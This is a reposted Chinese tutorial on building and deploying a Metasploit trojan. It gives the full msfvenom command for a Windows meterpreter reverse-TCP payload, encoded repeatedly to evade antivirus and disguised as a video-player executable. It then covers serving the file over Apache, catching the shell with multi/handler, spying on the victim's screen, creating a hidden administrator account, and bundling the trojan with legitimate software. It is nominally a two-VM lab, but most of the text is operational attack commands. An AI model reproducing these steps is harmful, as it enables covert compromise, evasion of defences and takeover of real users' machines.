admin管理员组

文章数量:1592057

使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机

1.制作木马

打开kali虚拟机

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe
使用msfvenom生成木马,
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
msfvenom是msf的一个模块。

解释一下代码。

-a 指定架构如 x 86 x64
x86对应的32位系统,x64对应64位系统。
–platform 指定平台
-p 指定 payload
windows/meterpreter/reverse_tcp是msf木马的类型,可以通过打开msf输入show payload来查看payload

LHOST
目标主机执行程序后连接我们 Kali 的地址
LPORT
目标主机执行程序后连接我们 Kali 的端口
-e是指定了一种编码器,增加了木马的免杀能力。
-i后面参数说明编码几次
-f指定木马生成的类型
-o后面指定木马生成的路径及名字
-b 去掉坏字符,坏字符会影响 payload 正常执行。

ls /var/www/html/
查看该文件下是否生成木马

systemctl start apache2

打开apache2服务器

2打开监听

依次输入
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip
set lport 端口
exploit

set payload windows/meterpreter/reverse_tcp
set lhost ip
set lport 端口这这三个是你生成木马时填的一样。

3.将木马植入目标机

ifconfig查看kali的IP地址。

在目标机上输入ip/文件名下载木马。
下载后点击运行。

表明监听到了,
使用run vnc查看中毒机器实时页面

在这里插入图片描述

4.提权操作

dir查看中毒机器下目录的其它文件
sysinfo查看目标机的电脑的一些信息
run getgui -u 用户名 -p 密码 建立一个用户
shell可以进入中毒机器的命令行
net localgroup administrators 用户名 /add 可以给你刚刚创建用户一个管理员权限
可以使用3389端口远程连接·
rdesktop id
输入刚刚创建的账户,即可远程连接。

5.捆绑软件

通过下载捆绑软件,将木马与正常软件绑定。

本文标签: 木马

版权声明:本文标题:msf_木马 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1728124983a1146290.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。